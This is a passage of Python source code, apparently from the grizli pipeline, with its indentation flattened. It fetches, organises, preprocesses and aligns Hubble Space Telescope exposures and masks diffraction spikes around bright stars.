Make RAW, Prep, Persistence, Extractions directories
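    Examples
    --------
    A minimal sketch; the root name and ``HOME_PATH`` are hypothetical:
    >>> paths = make_directories(root='j142724+334246', HOME_PATH='/data')
    >>> # `paths` is the dictionary from `create_path_dict`, with entries
    >>> # such as paths['raw'], paths['prep'], paths['persist']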
"""
import os
paths = create_path_dict(root=root, home=HOME_PATH, paths=paths)
for k in paths:
if k in ['thumbs']:
continue
dir = paths[k]
if not os.path.exists(dir):
print(f'mkdir {dir}')
os.mkdir(dir)
os.system(f'chmod ugoa+rwx {dir}')
else:
print(f'directory {dir} exists')
return paths
def fetch_files(field_root='j142724+334246', HOME_PATH='$PWD', paths={}, inst_products={'WFPC2/WFC': ['C0M', 'C1M'], 'WFPC2/PC': ['C0M', 'C1M'], 'ACS/WFC': ['FLC'], 'WFC3/IR': ['RAW'], 'WFC3/UVIS': ['FLC']}, remove_bad=True, reprocess_parallel=False, reprocess_clean_darks=True, s3_sync=False, fetch_flt_calibs=['IDCTAB', 'PFLTFILE', 'NPOLFILE'], filters=VALID_FILTERS, min_bad_expflag=2, fetch_only=False):
"""
    Fetch the RAW exposures for a field: download the files listed in the
    ``{field_root}_footprint.fits`` query table, gunzip them, flag visits
    with bad EXPFLAG values, reprocess the WFC3/IR ramps and fetch the
    associated calibration and persistence products
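    Examples
    --------
    A hedged usage sketch; the field name and home path are hypothetical and
    a ``{field_root}_footprint.fits`` table is assumed to exist there:
    >>> auto_script.fetch_files(field_root='j142724+334246',
    ...                         HOME_PATH='/data',
    ...                         reprocess_parallel=False, s3_sync=False)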
"""
import os
import glob
try:
from .. import utils
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.fetch_files')
except:
from grizli import utils
try:
try:
from mastquery import query, fetch
MAST_QUERY = True
instdet_key = 'instrument_name'
except:
from hsaquery import query, fetch
MAST_QUERY = False
instdet_key = 'instdet'
except ImportError as ERR:
warn = """{0}
Get one of the query scripts from
https://github.com/gbrammer/esa-hsaquery
https://github.com/gbrammer/mastquery
""".format(ERR)
raise(ImportError(warn))
paths = create_path_dict(root=field_root, home=HOME_PATH, paths=paths)
print('paths: ', paths)
if not os.path.exists(paths['raw']):
make_directories(root=field_root, HOME_PATH=HOME_PATH,
paths=paths)
tab = utils.read_catalog(os.path.join(paths['home'],
f'{field_root}_footprint.fits'))
# Fix CLEAR filter names
for i, filt_i in enumerate(tab['filter']):
if 'clear' in filt_i.lower():
spl = filt_i.lower().split(';')
if len(spl) > 1:
for s in spl:
if 'clear' not in s:
#print(filt_i, s)
filt_i = s.upper()
break
tab['filter'][i] = filt_i.upper()
use_filters = utils.column_string_operation(tab['filter'], filters,
method='startswith', logical='or')
tab = tab[use_filters]
if len(tab) > 0:
if MAST_QUERY:
tab = query.get_products_table(tab, extensions=['RAW', 'C1M'])
tab = tab[(tab['filter'] != 'F218W')]
if ONLY_F814W:
tab = tab[(tab['filter'] == 'F814W') |
(tab[instdet_key] == 'WFC3/IR')]
# Fetch and preprocess IR backgrounds
os.chdir(paths['raw'])
# Ignore files already moved to RAW/Expflag
bad_files = glob.glob('./Expflag/*')
badexp = np.zeros(len(tab), dtype=bool)
for file in bad_files:
root = os.path.basename(file).split('_')[0]
badexp |= tab['observation_id'] == root.lower()
is_wfpc2 = utils.column_string_operation(tab['instrument_name'],
'WFPC2', method='startswith', logical='or')
use_filters = utils.column_string_operation(tab['filter'],
filters, method='startswith', logical='or')
fetch_selection = (~badexp) & (~is_wfpc2) & use_filters
curl = fetch.make_curl_script(tab[fetch_selection], level=None,
script_name='fetch_{0}.sh'.format(field_root),
inst_products=inst_products, skip_existing=True,
output_path='./', s3_sync=s3_sync)
msg = 'Fetch {0} files (s3_sync={1})'.format(fetch_selection.sum(),
s3_sync)
utils.log_comment(utils.LOGFILE, msg, verbose=True)
# Ugly callout to shell
os.system('sh fetch_{0}.sh'.format(field_root))
if (is_wfpc2 & use_filters).sum() > 0:
# Have to get WFPC2 from ESA
wfpc2_files = (~badexp) & (is_wfpc2) & use_filters
curl = fetch.make_curl_script(tab[wfpc2_files], level=None,
script_name='fetch_wfpc2_{0}.sh'.format(field_root),
inst_products=inst_products, skip_existing=True,
output_path='./', s3_sync=False)
os.system('sh fetch_wfpc2_{0}.sh'.format(field_root))
else:
msg = 'Warning: no files to fetch for filters={0}.'.format(filters)
utils.log_comment(utils.LOGFILE, msg, verbose=True)
# Gunzip if necessary
files = glob.glob('*raw.fits.gz')
files.extend(glob.glob('*fl?.fits.gz'))
files.extend(glob.glob('*c[01]?.fits.gz')) # WFPC2
files.sort()
for file in files:
status = os.system('gunzip {0}'.format(file))
print('gunzip '+file+' # status="{0}"'.format(status))
if status == 256:
os.system('mv {0} {1}'.format(file, file.split('.gz')[0]))
if fetch_only:
files = glob.glob('*raw.fits')
files.sort()
return files
# Remove exposures with bad EXPFLAG
if remove_bad:
remove_bad_expflag(field_root=field_root, HOME_PATH=paths['home'],
min_bad=min_bad_expflag)
# Reprocess the RAWs into FLTs
if reprocess_parallel:
rep = "python -c 'from grizli.pipeline import reprocess; "
rep += "reprocess.reprocess_wfc3ir(parallel={0},clean_dark_refs={1})'"
os.system(rep.format(reprocess_parallel, reprocess_clean_darks))
else:
from grizli.pipeline import reprocess
reprocess.reprocess_wfc3ir(parallel=False,
clean_dark_refs=reprocess_clean_darks)
# Fetch PFLAT reference files needed for optimal drizzled weight images
if fetch_flt_calibs:
flt_files = glob.glob('*_fl?.fits')
flt_files.sort()
#calib_paths = []
for file in flt_files:
cpaths = utils.fetch_hst_calibs(file,
calib_types=fetch_flt_calibs)
# calib_paths.extend(paths)
# Copy mask files generated from preprocessing
os.system('cp *mask.reg {0}'.format(paths['prep']))
# Persistence products
os.chdir(paths['persist'])
persist_files = fetch.persistence_products(tab)
for file in persist_files:
if not os.path.exists(os.path.basename(file)):
print(file)
os.system('curl -O {0}'.format(file))
for file in persist_files:
root = os.path.basename(file).split('.tar.gz')[0]
if os.path.exists(root):
print('Skip', root)
continue
# Ugly callout to shell
os.system('tar xzvf {0}.tar.gz'.format(root))
os.system('rm {0}/*extper.fits {0}/*flt_cor.fits'.format(root))
os.system('ln -sf {0}/*persist.fits ./'.format(root))
def remove_bad_expflag(field_root='', HOME_PATH='./', min_bad=2):
"""
Remove FLT files in RAW directory with bad EXPFLAG values, which
usually corresponds to failed guide stars.
The script moves files associated with an affected visit to a subdirectory
>>> bad_dir = os.path.join(HOME_PATH, field_root, 'RAW', 'Expflag')
Parameters
----------
field_root : str
Field name, i.e., 'j123654+621608'
HOME_PATH : str
Base path where files are found.
    min_bad : int
        Minimum number of exposures in a visit with ``EXPFLAG != 'NORMAL'``
        (e.g., 'INDETERMINATE') required to flag the visit. Occasionally the
        first exposure of a visit has a bad flag set even though guiding is
        OK, so set to 2 so that only visits with multiple affected exposures
        are moved.
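    Examples
    --------
    A minimal sketch (hypothetical field); flagged visits are moved to the
    ``RAW/Expflag`` subdirectory:
    >>> remove_bad_expflag(field_root='j142724+334246', HOME_PATH='/data',
    ...                    min_bad=2)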
"""
import os
import glob
import numpy as np
try:
from .. import prep, utils
except:
from grizli import prep, utils
os.chdir(os.path.join(HOME_PATH, field_root, 'RAW'))
files = glob.glob('*raw.fits')+glob.glob('*flc.fits')
files.sort()
if len(files) == 0:
return False
expf = utils.header_keys_from_filelist(files, keywords=['EXPFLAG'],
ext=0, colname_case=str.upper)
expf.write('{0}_expflag.txt'.format(field_root),
format='csv', overwrite=True)
visit_name = np.array([file[:6] for file in expf['FILE']])
visits = np.unique(visit_name)
for visit in visits:
bad = (visit_name == visit) & (expf['EXPFLAG'] != 'NORMAL')
if bad.sum() >= min_bad:
logstr = '# Found bad visit: {0}, N={1}\n'
logstr = logstr.format(visit, bad.sum())
utils.log_comment(utils.LOGFILE, logstr, verbose=True)
if not os.path.exists('Expflag'):
os.mkdir('Expflag')
os.system('mv {0}* Expflag/'.format(visit))
def parse_visits(field_root='', RAW_PATH='../RAW', use_visit=True, combine_same_pa=True, combine_minexp=2, is_dash=False, filters=VALID_FILTERS, max_dt=1e9, visit_split_shift=1.5):
"""
Organize exposures into "visits" by filter / position / PA / epoch
Parameters
----------
field_root : str
Rootname of the ``{field_root}_visits.npy`` file to create.
RAW_PATH : str
Path to raw exposures, relative to working directory
use_visit, max_dt, visit_split_shift : bool, float, float
See `~grizli.utils.parse_flt_files`.
combine_same_pa : bool
Combine exposures taken at same PA/orient + filter across visits
combine_minexp : int
Try to concatenate visits with fewer than this number of exposures
filters : list
Filters to consider
Returns
-------
visits : list
List of "visit" dicts with keys ``product``, ``files``, ``footprint``,
etc.
groups : list
Visit groups for direct / grism
info : `~astropy.table.Table`
Exposure summary table
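    Examples
    --------
    A hedged sketch, run from the working (Prep) directory of a hypothetical
    field with the raw exposures in ``../RAW``:
    >>> visits, groups, info = auto_script.parse_visits(
    ...     field_root='j142724+334246', RAW_PATH='../RAW',
    ...     combine_same_pa=True, max_dt=0.5)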
"""
import copy
#import grizli.prep
try:
from .. import prep, utils
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.parse_visits')
except:
from grizli import prep, utils
from shapely.geometry import Polygon
from scipy.spatial import ConvexHull
files = glob.glob(os.path.join(RAW_PATH, '*fl[tc].fits'))
files += glob.glob(os.path.join(RAW_PATH, '*c0m.fits'))
files += glob.glob(os.path.join(RAW_PATH, '*c0f.fits'))
files.sort()
info = utils.get_flt_info(files)
#info = info[(info['FILTER'] != 'G141') & (info['FILTER'] != 'G102')]
# Only F814W on ACS
if ONLY_F814W:
info = info[((info['INSTRUME'] == 'WFC3') & (info['DETECTOR'] == 'IR')) | (info['FILTER'] == 'F814W')]
elif filters is not None:
sel = utils.column_string_operation(info['FILTER'], filters,
method='count', logical='OR')
info = info[sel]
if is_dash:
# DASH visits split by exposure
ima_files = glob.glob(os.path.join(RAW_PATH, '*ima.fits'))
ima_files.sort()
visits = []
for file in ima_files:
# Build from IMA filename
root = os.path.basename(file).split("_ima")[0][:-1]
im = pyfits.open(file)
filt = utils.get_hst_filter(im[0].header).lower()
wcs = pywcs.WCS(im['SCI'].header)
fp = Polygon(wcs.calc_footprint())
            # {root}q_flt.fits is the standard pipeline product; only the
            # individual DASH-split [a-o]_flt.fits exposures are used here
files = glob.glob(os.path.join(RAW_PATH,
f'{root}*[a-o]_flt.fits'))
files.sort()
if len(files) == 0:
continue
files = [os.path.basename(file) for file in files]
direct = {'product': '{0}-{1}'.format(root, filt),
'files': files, 'footprint': fp}
visits.append(direct)
all_groups = utils.parse_grism_associations(visits)
np.save('{0}_visits.npy'.format(field_root),
[visits, all_groups, info])
return visits, all_groups, info
visits, filters = utils.parse_flt_files(info=info,
uniquename=True, get_footprint=True,
use_visit=use_visit, max_dt=max_dt,
visit_split_shift=visit_split_shift)
# Don't run combine_minexp if have grism exposures
grisms = ['G141', 'G102', 'G800L', 'G280']
has_grism = utils.column_string_operation(info['FILTER'], grisms,
'count', 'or').sum()
if combine_same_pa:
combined = {}
for visit in visits:
filter_pa = '-'.join(visit['product'].split('-')[-2:])
prog = '-'.join(visit['product'].split('-')[-4:-3])
key = 'i{0}-{1}'.format(prog, filter_pa)
if key not in combined:
combined[key] = {'product': key, 'files': [], 'footprint': visit['footprint']}
combined[key]['files'].extend(visit['files'])
visits = [combined[k] for k in combined]
# Account for timing to combine only exposures taken at an
# epoch defined by `max_dt` days.
msg = 'parse_visits(combine_same_pa={0}),'.format(combine_same_pa)
msg += ' max_dt={1:.1f}: {0} {2:>3} visits'
utils.log_comment(utils.LOGFILE,
msg.format('BEFORE', max_dt, len(visits)),
verbose=True, show_date=True)
split_list = []
for v in visits:
            split_list.extend(utils.split_visit(v, max_dt=max_dt,
                                        visit_split_shift=visit_split_shift))
visits = split_list
utils.log_comment(utils.LOGFILE,
msg.format(' AFTER', max_dt, len(visits)),
verbose=True, show_date=True)
get_visit_exposure_footprints(visits)
print('** Combine same PA: **')
for i, visit in enumerate(visits):
print('{0} {1} {2}'.format(i, visit['product'], len(visit['files'])))
elif (combine_minexp > 0) & (not has_grism):
combined = []
for visit in visits:
if len(visit['files']) >= combine_minexp*1:
combined.append(copy.deepcopy(visit))
else:
filter_pa = '-'.join(visit['product'].split('-')[-2:])
has_match = False
fp = visit['footprint']
for ic, cvisit in enumerate(combined):
ckey = '-'.join(cvisit['product'].split('-')[-2:])
if ckey == filter_pa:
cfp = cvisit['footprint']
if cfp.intersection(fp).area > 0.2*fp.area:
has_match = True
cvisit['files'].extend(visit['files'])
if 'footprints' in visit.keys():
cvisit['footprints'].extend(visit['footprints'])
cvisit['footprint'] = cfp.union(fp)
# No match, add the singleton visit
if not has_match:
combined.append(copy.deepcopy(visit))
visits = combined
print('** Combine Singles: **')
for i, visit in enumerate(visits):
print('{0} {1} {2}'.format(i, visit['product'], len(visit['files'])))
all_groups = utils.parse_grism_associations(visits)
print('\n == Grism groups ==\n')
valid_groups = []
for g in all_groups:
try:
print(g['direct']['product'], len(g['direct']['files']), g['grism']['product'], len(g['grism']['files']))
valid_groups.append(g)
except:
pass
all_groups = valid_groups
np.save('{0}_visits.npy'.format(field_root), [visits, all_groups, info])
return visits, all_groups, info
def get_visit_exposure_footprints(visit_file='j1000p0210_visits.npy', check_paths=['./', '../RAW'], simplify=1.e-6):
"""
Add exposure-level footprints to the visit dictionary
Parameters
----------
visit_file : str, list
File produced by `parse_visits` (`visits`, `all_groups`, `info`).
If a list, just parse a list of visits and don't save the file.
check_paths : list
Look for the individual exposures in `visits[i]['files']` in these
paths.
simplify : float
        Shapely `simplify` tolerance applied to the visit footprint polygon.
Returns
-------
    visits : list
        The input list of visit dictionaries, updated in place with
        `footprint` and `footprints` keys.
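    Examples
    --------
    A minimal sketch with a hypothetical visits file:
    >>> visits = get_visit_exposure_footprints('j142724+334246_visits.npy',
    ...                                        check_paths=['./', '../RAW'])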
"""
if isinstance(visit_file, str):
visits, all_groups, info = np.load(visit_file, allow_pickle=True)
else:
visits = visit_file
fps = {}
for visit in visits:
visit['footprints'] = []
visit_fp = None
for file in visit['files']:
fp_i = None
for path in check_paths:
pfile = os.path.join(path, file)
if os.path.exists(pfile):
fp_i = utils.get_flt_footprint(flt_file=pfile)
if visit_fp is None:
visit_fp = fp_i.buffer(1./3600)
else:
visit_fp = visit_fp.union(fp_i.buffer(1./3600))
break
visit['footprints'].append(fp_i)
if visit_fp is not None:
if simplify > 0:
visit['footprint'] = visit_fp.simplify(simplify)
else:
visit['footprint'] = visit_fp
fps[file] = fp_i
# ToDo: also update visits in all_groups with `fps`
# Resave the file
if isinstance(visit_file, str):
np.save(visit_file, [visits, all_groups, info])
return visits
def manual_alignment(field_root='j151850-813028', HOME_PATH='/Volumes/Pegasus/Grizli/Automatic/', skip=True, radius=5., catalogs=['PS1', 'DES', 'SDSS', 'GAIA', 'WISE'], visit_list=None, radec=None):
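    """
    Interactive alignment of direct-imaging visits with DS9
    Loops over the direct visits in ``{field_root}_visits.npy``, skipping
    those that already have an ``.align_guess`` file when ``skip=True``, and
    calls `prep.manual_alignment` on each with a DS9 window and a reference
    catalog (fetched with `get_radec_catalog` when ``radec`` is None).
    """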
#import pyds9
import glob
import os
import numpy as np
#import grizli
from ..prep import get_radec_catalog
from .. import utils, prep, ds9
files = glob.glob('*guess')
tab = utils.read_catalog(os.path.join(HOME_PATH,
f'{field_root}_footprint.fits'))
visits, all_groups, info = np.load('{0}_visits.npy'.format(field_root),
allow_pickle=True)
use_visits = []
for visit in visits:
if visit_list is not None:
if visit['product'] not in visit_list:
continue
filt = visit['product'].split('-')[-1]
if (not filt.startswith('g')):
hasg = os.path.exists('{0}.align_guess'.format(visit['product']))
if hasg & skip:
continue
use_visits.append(visit)
print(len(use_visits), len(visits))
if len(use_visits) == 0:
return True
if radec is None:
radec, ref_catalog = get_radec_catalog(ra=np.mean(tab['ra']),
dec=np.median(tab['dec']),
product=field_root,
reference_catalogs=catalogs, radius=radius)
else:
ref_catalog = catalogs[0]
reference = '{0}/{1}_{2}.reg'.format(os.getcwd(), field_root,
ref_catalog.lower())
ds9 = ds9.DS9()
ds9.set('mode pan')
ds9.set('scale zscale')
ds9.set('scale log')
for visit in use_visits:
filt = visit['product'].split('-')[-1]
if (not filt.startswith('g')):
prep.manual_alignment(visit, reference=reference, ds9=ds9)
ds9.set('quit')
def clean_prep(field_root='j142724+334246'):
"""
Clean unneeded files after the field preparation
"""
import glob
import os
visits, all_groups, info = np.load('{0}_visits.npy'.format(field_root),
allow_pickle=True)
for visit in visits:
for ext in ['_drz_wht', '_seg', '_bkg']:
file = visit['product']+ext+'.fits'
if os.path.exists(file):
print('remove '+file)
os.remove(file)
clean_files = glob.glob('*crclean.fits')
for file in clean_files:
print('remove '+file)
os.remove(file)
# Do this in preprocess to avoid doing it over and over
# Fix NaNs
# flt_files = glob.glob('*_fl?.fits')
# for flt_file in flt_files:
# utils.fix_flt_nan(flt_file, verbose=True)
def preprocess(field_root='j142724+334246', HOME_PATH='/Volumes/Pegasus/Grizli/Automatic/', PERSIST_PATH=None, min_overlap=0.2, make_combined=True, catalogs=['PS1', 'DES', 'NSC', 'SDSS', 'GAIA', 'WISE'], use_visit=True, master_radec=None, parent_radec=None, use_first_radec=False, skip_imaging=False, clean=True, skip_single_optical_visits=True, visit_prep_args=args['visit_prep_args'], persistence_args=args['persistence_args']):
"""
    Run the visit-level preprocessing: astrometric alignment, background
    subtraction and persistence masking for the grism and imaging visits.
    master_radec : force the use of this radec reference file for every visit
    parent_radec : fall back to this radec file when a visit's overlap with
        the existing visit catalogs is < `min_overlap`
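    A hedged sketch, run from the Prep directory of a hypothetical field
    after `parse_visits` has written ``{field_root}_visits.npy``:
    >>> auto_script.preprocess(field_root='j142724+334246',
    ...                        HOME_PATH='/data', master_radec=None)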
"""
try:
from .. import prep, utils
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.preprocess')
except:
from grizli import prep, utils
import os
import glob
import numpy as np
import grizli
from shapely.geometry import Polygon
from scipy.spatial import ConvexHull
import copy
if PERSIST_PATH is None:
PERSIST_PATH = os.path.join(HOME_PATH, field_root, 'Persistence')
visits, all_groups, info = np.load(f'{field_root}_visits.npy',
allow_pickle=True)
# Grism visits
master_footprint = None
radec = None
# Master table
# visit_table = os.path.join(os.path.dirname(grizli.__file__), 'data/visit_alignment.txt')
# if os.path.exists(visit_table):
# visit_table = utils.GTable.gread(visit_table)
# else:
# visit_table = None
for i in range(len(all_groups)):
direct = all_groups[i]['direct']
grism = all_groups[i]['grism']
print(i, direct['product'], len(direct['files']), grism['product'], len(grism['files']))
if len(glob.glob(grism['product']+'_dr?_sci.fits')) > 0:
print('Skip grism', direct['product'], grism['product'])
continue
# Do all ACS G800L files exist?
if 'g800l' in grism['product']:
test_flc = True
for file in grism['files']:
test_flc &= os.path.exists(file)
if test_flc:
print('Skip grism (all FLC exist)', direct['product'],
grism['product'])
continue
# Make guess file
# if visit_table is not None:
# ix = ((visit_table['visit'] == direct['product']) &
# (visit_table['field'] == field_root))
#
# if ix.sum() > 0:
# guess = visit_table['xshift', 'yshift', 'rot', 'scale'][ix]
# guess['rot'] = 0.
# guess['scale'] = 1.
# print('\nWCS: '+direct['product']+'\n', guess)
# guess.write('{0}.align_guess'.format(direct['product']),
# format='ascii.commented_header')
if master_radec is not None:
radec = master_radec
best_overlap = 0.
else:
radec_files = glob.glob('*cat.radec')
radec = parent_radec
best_overlap = 0
fp = direct['footprint']
for rdfile in radec_files:
if os.path.exists(rdfile.replace('cat.radec', 'wcs_failed')):
continue
points = np.loadtxt(rdfile)
try:
hull = ConvexHull(points)
except:
continue
rd_fp = Polygon(points[hull.vertices, :])
olap = rd_fp.intersection(fp)
if (olap.area > min_overlap*fp.area) & (olap.area > best_overlap):
radec = rdfile
best_overlap = olap.area
if use_first_radec:
master_radec = radec
print('\n\n\n{0} radec: {1}\n\n\n'.format(direct['product'], radec))
###########################
# Preprocessing script, background subtraction, etc.
status = prep.process_direct_grism_visit(direct=direct, grism=grism,
radec=radec, skip_direct=False, **visit_prep_args)
###################################
# Persistence Masking
for file in direct['files']+grism['files']:
print(file)
pfile = os.path.join(PERSIST_PATH,
file.replace('_flt', '_persist'))
if os.path.exists(pfile):
prep.apply_persistence_mask(file, path=PERSIST_PATH,
**persistence_args)
# Fix NaNs
utils.fix_flt_nan(file, verbose=True)
# From here, `radec` will be the radec file from the first grism visit
#master_radec = radec
if skip_imaging:
return True
# Ancillary visits
imaging_visits = []
for visit in visits:
filt = visit['product'].split('-')[-1]
if (len(glob.glob(visit['product']+'_dr?_sci.fits')) == 0) & (not filt.startswith('g1')):
imaging_visits.append(visit)
# Run preprocessing in order of decreasing filter wavelength
filters = [v['product'].split('-')[-1] for v in visits]
fwave = np.cast[float]([f.replace('f1', 'f10'). \
replace('f098m', 'f0980m'). \
replace('lp', 'w'). \
replace('fq', 'f')[1:-1]
for f in filters])
if len(np.unique(fwave)) > 1:
sort_idx = np.argsort(fwave)[::-1]
else:
sort_idx = np.arange(len(fwave), dtype=int)
for i in sort_idx:
direct = visits[i]
if 'g800l' in direct['product']:
continue
# Skip singleton optical visits
if (fwave[i] < 900) & (len(direct['files']) == 1):
if skip_single_optical_visits:
print('Only one exposure, skip', direct['product'])
continue
if len(glob.glob(direct['product']+'_dr?_sci.fits')) > 0:
print('Skip', direct['product'])
continue
else:
print(direct['product'])
if master_radec is not None:
radec = master_radec
best_overlap = 0
fp = direct['footprint']
else:
radec_files = glob.glob('*cat.radec')
radec = parent_radec
best_overlap = 0
radec_n = 0
fp = direct['footprint']
for rdfile in radec_files:
points = np.loadtxt(rdfile)
hull = ConvexHull(points)
rd_fp = Polygon(points[hull.vertices, :])
olap = rd_fp.intersection(fp)
if (olap.area > min_overlap*fp.area) & (olap.area > best_overlap) & (len(points) > 0.2*radec_n):
radec = rdfile
best_overlap = olap.area
radec_n = len(points)
print('\n\n\n{0} radec: {1} ({2:.2f})\n\n\n'.format(direct['product'], radec, best_overlap/fp.area))
try:
try:
status = prep.process_direct_grism_visit(direct=direct,
grism={}, radec=radec,
skip_direct=False, **visit_prep_args)
except:
utils.log_exception(utils.LOGFILE, traceback)
utils.log_comment(utils.LOGFILE, "# !! First `prep` run failed with `run_tweak_align`. Try again")
if 'run_tweak_align' in visit_prep_args:
visit_prep_args['run_tweak_align'] = False
status = prep.process_direct_grism_visit(direct=direct,
grism={}, radec=radec,
skip_direct=False, **visit_prep_args)
failed_file = '%s.failed' % (direct['product'])
if os.path.exists(failed_file):
os.remove(failed_file)
###################################
# Persistence Masking
for file in direct['files']:
print(file)
pfile = os.path.join(PERSIST_PATH,
file.replace('_flt', '_persist'))
if os.path.exists(pfile):
prep.apply_persistence_mask(file, path=PERSIST_PATH,
**persistence_args)
# Fix NaNs
utils.fix_flt_nan(file, verbose=True)
except:
fp = open('%s.failed' % (direct['product']), 'w')
fp.write('\n')
fp.close()
###################################
# WFC3/IR Satellite trails
if False:
from mywfc3.satdet import _detsat_one
wfc3 = (info['INSTRUME'] == 'WFC3') & (info['DETECTOR'] == 'IR')
for file in info['FILE'][wfc3]:
print(file)
mask = _detsat_one(file, update=False, ds9=None, plot=False, verbose=True)
###################################
# Clean up
if clean:
clean_prep(field_root=field_root)
###################################
# Drizzle by filter
# failed = [f.split('.failed')[0] for f in glob.glob('*failed')]
# keep_visits = []
# for visit in visits:
# if visit['product'] not in failed:
# keep_visits.append(visit)
#
# overlaps = utils.parse_visit_overlaps(keep_visits, buffer=15.0)
# np.save('{0}_overlaps.npy'.format(field_root), [overlaps])
#
# keep = []
# wfc3ir = {'product':'{0}-ir'.format(field_root), 'files':[]}
# if not make_combined:
# return True
#
# for overlap in overlaps:
# filt = overlap['product'].split('-')[-1]
# overlap['product'] = '{0}-{1}'.format(field_root, filt)
#
# overlap['reference'] = '{0}-ir_drz_sci.fits'.format(field_root)
#
# if False:
# if 'g1' not in filt:
# keep.append(overlap)
# else:
# keep.append(overlap)
#
# if filt.upper() in ['F098M','F105W','F110W', 'F125W','F140W','F160W']:
# wfc3ir['files'].extend(overlap['files'])
#
# prep.drizzle_overlaps([wfc3ir], parse_visits=False, pixfrac=0.6, scale=0.06, skysub=False, bits=None, final_wcs=True, final_rot=0, final_outnx=None, final_outny=None, final_ra=None, final_dec=None, final_wht_type='IVM', final_wt_scl='exptime', check_overlaps=False)
#
# prep.drizzle_overlaps(keep, parse_visits=False, pixfrac=0.6, scale=0.06, skysub=False, bits=None, final_wcs=True, final_rot=0, final_outnx=None, final_outny=None, final_ra=None, final_dec=None, final_wht_type='IVM', final_wt_scl='exptime', check_overlaps=False)
def mask_IR_psf_spikes(visit={},
mag_lim=17, cat=None, cols=['mag_auto', 'ra', 'dec'], minR=8, dy=5, selection=None, length_scale=1, dq_bit=2048):
"""
Mask 45-degree diffraction spikes around bright stars
    Parameters
    ----------
    mag_lim : float
        Faint magnitude limit for stars to mask when `selection` is None.
    minR : float
        Mask spike pixels > `minR` pixels from the star centers.
    dy : int
        Mask spike pixels +/- `dy` pixels from the computed center of a spike.
    selection : bool array
        If None, compute the selection as `mag < mag_lim` from `cat`.
        Otherwise, use the supplied array as the selection mask.
length_scale : float
Scale length of the spike mask by this factor. The default spike mask
length in pixels is
>>> # m = star AB magnitude
>>> mask_len = 4*np.sqrt(10**(-0.4*(np.minimum(m,17)-17)))/0.06
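    For example, a star with m = 15 gives a mask roughly
    4*np.sqrt(10**(-0.4*(15-17)))/0.06 ~ 168 pixels long, before applying
    `length_scale`.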
"""
from scipy.interpolate import griddata
if cat is None:
cat = utils.read_catalog('{0}.cat.fits'.format(visit['product']))
try:
mag, ra, dec = cat[cols[0]], cat[cols[1]], cat[cols[2]]
except:
mag, ra, dec = cat['MAG_AUTO'], cat['X_WORLD'], cat['Y_WORLD']
if selection is None:
        selection = mag < mag_lim
for file in visit['files']:
if not os.path.exists(file):
print('Mask diffraction spikes (skip file {0})'.format(file))
continue
im = pyfits.open(file, mode='update')
print('Mask diffraction spikes ({0}), N={1} objects'.format(file, selection.sum()))
for ext in [1, 2, 3, 4]:
if ('SCI', ext) not in im:
break
wcs = pywcs.WCS(im['SCI', ext].header, fobj=im)
try:
cd = wcs.wcs.cd
except:
cd = wcs.wcs.pc
footp = utils.WCSFootprint(wcs)
points = np.array([ra, dec]).T
selection &= footp.path.contains_points(points)
if selection.sum() == 0:
continue
sh = im['SCI', ext].data.shape
mask = np.zeros(sh, dtype=int)
iy, ix = np.indices(sh)
# Spider angles, by hand!
thetas = np.array([[1.07000000e+02, 1.07000000e+02, -8.48089636e-01, 8.46172810e-01],
[3.07000000e+02, 1.07000000e+02, -8.48252315e-01, 8.40896646e-01],
[5.07000000e+02, 1.07000000e+02, -8.42360089e-01, 8.38631568e-01],
[7.07000000e+02, 1.07000000e+02, -8.43990233e-01, 8.36766818e-01],
[9.07000000e+02, 1.07000000e+02, -8.37264191e-01, 8.31481992e-01],
[1.07000000e+02, 3.07000000e+02, -8.49196752e-01, 8.47137753e-01],
[3.07000000e+02, 3.07000000e+02, -8.46919396e-01, 8.43697746e-01],
[5.07000000e+02, 3.07000000e+02, -8.43849045e-01, 8.39136104e-01],
[7.07000000e+02, 3.07000000e+02, -8.40070025e-01, 8.36362299e-01],
[9.07000000e+02, 3.07000000e+02, -8.35218388e-01, 8.34258999e-01],
[1.07000000e+02, 5.07000000e+02, -8.48708154e-01, 8.48377823e-01],
[3.07000000e+02, 5.07000000e+02, -8.45874787e-01, 8.38512574e-01],
[5.07000000e+02, 5.07000000e+02, -8.37238493e-01, 8.42544142e-01],
[7.07000000e+02, 5.07000000e+02, -8.26696970e-01, 8.37981214e-01],
[9.07000000e+02, 5.07000000e+02, -8.29422567e-01, 8.32182726e-01],
[1.07000000e+02, 7.07000000e+02, -8.42331487e-01, 8.43417815e-01],
[3.07000000e+02, 7.07000000e+02, -8.40006233e-01, 8.48355643e-01],
[5.07000000e+02, 7.07000000e+02, -8.39776844e-01, 8.48106508e-01],
[7.07000000e+02, 7.07000000e+02, -8.38620315e-01, 8.40031240e-01],
[9.07000000e+02, 7.07000000e+02, -8.28351652e-01, 8.31933185e-01],
[1.07000000e+02, 9.07000000e+02, -8.40726238e-01, 8.51621083e-01],
[3.07000000e+02, 9.07000000e+02, -8.36006159e-01, 8.46746171e-01],
[5.07000000e+02, 9.07000000e+02, -8.35987878e-01, 8.48932633e-01],
[7.07000000e+02, 9.07000000e+02, -8.34104095e-01, 8.46009851e-01],
[9.07000000e+02, 9.07000000e+02, -8.32700159e-01, 8.38512715e-01]])
thetas[thetas == 107] = 0
thetas[thetas == 907] = 1014
xy = np.array(wcs.all_world2pix(ra[selection], dec[selection], 0)).T
t0 = griddata(thetas[:, :2], thetas[:, 2], xy, method='linear',
fill_value=np.mean(thetas[:, 2]))
t1 = griddata(thetas[:, :2], thetas[:, 3], xy, method='linear',
fill_value=np.mean(thetas[:, 3]))
for i, m in enumerate(mag[selection]):
# Size that depends on magnitude
xlen = 4*np.sqrt(10**(-0.4*(np.minimum(m, 17)-17)))/0.06
xlen *= length_scale
x = np.arange(-xlen, xlen, 0.05)
xx = np.array([x, x*0.])
for t in [t0[i], t1[i]]:
_mat = np.array([[np.cos(t), -np.sin(t)],
[np.sin(t), np.cos(t)]])
xr = _mat.dot(xx).T
x = xr+xy[i, :]
xp = np.cast[int](np.round(x))
#plt.plot(xp[:,0], xp[:,1], color='pink', alpha=0.3, linewidth=5)
for j in range(-dy, dy+1):
ok = (xp[:, 1]+j >= 0) & (xp[:, 1]+j < sh[0])
ok &= (xp[:, 0] >= 0) & (xp[:, 0] < sh[1])
ok &= np.abs(xp[:, 1]+j - xy[i, 1]) > minR
